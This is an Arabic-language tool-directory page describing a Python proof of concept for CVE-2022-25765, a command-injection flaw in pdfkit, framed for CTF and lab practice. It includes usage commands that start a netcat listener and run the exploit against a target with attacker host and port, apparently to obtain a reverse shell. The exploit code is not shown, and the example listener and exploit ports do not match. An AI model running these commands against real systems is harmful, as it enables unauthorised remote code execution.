Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-25765 — إثبات مفهوم بلغة بايثون لثغرة CVE-2022-25765، وهي ثغرة حقن أوامر في pdfkit، تتيح تنفيذ التعليمات البرمجية عن بُعد عبر توليد ملفات PDF مصممة خصيصًا. | Kitploit
أدوات/GitHubGitHub/innocentx0/cve-2022-25765
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبCTFاختبار الاختراقالقيادة والسيطرةالتعلم والتعليم
GitHubinnocentx0/cve-2022-25765

CVE-2022-25765

إثبات مفهوم بلغة بايثون لثغرة CVE-2022-25765، وهي ثغرة حقن أوامر في pdfkit، تتيح تنفيذ التعليمات البرمجية عن بُعد عبر توليد ملفات PDF مصممة خصيصًا.

عرض المستودع
منذ 16س 53دلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-25765 — pdfkit

إثبات مفهوم (PoC) لثغرة CVE-2022-25765، والتي تؤثر على الإصدارات المعرضة للخطر من pdfkit.

تم اختباره مع pdfkit 0.8.6.

المتطلبات

  • Python 3.x
  • requests
  • colorama

تثبيت التبعيات:

root@kitploit:~
pip3 install -r requirements.txt

أو يدويًا:

root@kitploit:~
pip3 install requests colorama

الاستخدام

root@kitploit:~
python3 exploit2.py -u <TARGET> -l <LHOST> -p <LPORT>

مثال: شغّل مستمعًا

root@kitploit:~
nc -lvnp 4242
root@kitploit:~
python3 exploit2.py -u http://10.10.10.10 -l 10.10.14.5 -p 4444

الإعداد

استنساخ المستودع:

root@kitploit:~
git clone [email protected]:innocentx0/CVE-2022-25765.git
cd CVE-2022-25765

تثبيت المتطلبات:

root@kitploit:~
pip3 install -r requirements.txt

شغّل إثبات المفهوم ضد هدفك في بيئة المختبر.

الثغرة

CVE-2022-25765 هي ثغرة حقن أوامر في الإصدارات المعرضة للخطر من pdfkit.

ترتبط المشكلة بعدم كفاية تعقيم المدخلات التي يتحكم فيها المستخدم والتي يتم تمريرها إلى عملية توليد ملفات PDF.

ملاحظات

صُمم إثبات المفهوم هذا بشكل أساسي لأغراض التعلم وبيئات CTF/المختبرات.

إذا كنت تبحث عن مكان لتجربته، Hack The Box: الجهاز: Precious.

إخلاء مسؤولية

استخدم هذا فقط ضد الأنظمة التي تملكها أو لديك إذن صريح لاختبارها.

لست مسؤولًا عن سوء الاستخدام أو الأضرار الناجمة عن هذا المشروع.


INNOCENTx0

تنزيل الأداة